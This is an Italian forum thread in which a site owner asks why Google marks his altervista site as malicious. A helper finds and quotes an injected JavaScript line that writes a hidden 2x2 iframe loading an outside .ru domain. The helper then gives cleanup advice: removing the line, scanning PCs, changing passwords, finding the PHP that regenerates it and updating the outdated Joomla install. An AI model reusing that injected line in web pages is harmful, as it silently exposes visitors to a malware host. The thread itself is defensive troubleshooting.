Sito malevolo

Come mai da un giorno all'altro il mio sito risulta da google come malevolo?

http://seafightstrategy.altervista.org/

Come posso rimediare?

[alemoppo]

In tutti i file javascript che ho analizzato nel tuo sito, come ultima riga c'é questa che è (molto) sospetta:

Codice:

document.write('<iframe src="http://wayoseswindows.ru/Tech?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

Sicuramente penso vada eliminata... Se ritorna, c'é sicuramente uno script PHP che la rigenera. Quindi dovresti scovare il colpevole. In questo caso le cose da fare sono:
-Rimuovere eventuali malaware da tutti i PC da cui ti connetti ad altervista.
-Modificare la password di altervista
-Eliminare tutti i file che generano quella riga e, ovviamente, quelle righe.
-se usi un applicativo, come joomla o wordpress, devi mantenerlo costantemente aggiornato

_____

In ogni caso, anche se l'eliminazione della riga andasse a buon fine, comunque google ancora continuerà a bloccare il tuo sito, finché si non si accorge dell'eliminazione. Puoi comunque segnalare una "ricontrollata" a google, dai suoi strumenti per wembaster.

Ciao!

Grazie ,mille per la veloce risposta sei stato molto preciso, spero di risolvere il problema

Avevi ragione nel momento in cui vado ad eliminare il file ed ad inserire quello corretto (avevo fatto un backup che non presenta tale riga di codice) si ripresenta la riga in questione.

Uso un applicativo superato di joomla e per me sarebbe molto complicato aggiornare il tutto

Hai qualche idea su come si potrebbe risolvere il problema senza aggiornare?

Come un vero neofita mi rispondo da solo.

Ho fatto una pulizia profonda di malware nel mio pc e ho cambiato password ftp.

Sembra che la stringa sia scomparsa.

Potresti dare un occhio veloce anche tu?

Scusa ancora il disturbo

[alemoppo]

Quella riga ancora è presente.

Dovresti fare la cosa più difficile:

-Eliminare tutti i file che generano quella riga e...

Non è una cosa semplice, perché occorre guardare tutti i file php e rintracciare il codice che inietta quel sorgente.

{da adesso in poi tieni presente che non ho mai utilizzato joomla, e non son con certezza nemmeno se si può fare}:
Un'altra soluzione sarebbe: (prima fai un backup totale del sito) fare un backup dei dati di joomla, reinstallare joomla e ricaricare i dati.

Uso un applicativo superato di joomla e per me sarebbe molto complicato aggiornare il tutto

Quasi certamente allora è questo il problema: le nuove versioni degli applicativi (non solo di joomla) risolvono le vulnerabilità; quindi se non si aggiornano, queste rimangono e vengono sfruttate dai cracker e/o approfittatori.

p.s: non fare post consecutivi nel forum: è vietato.

Ciao!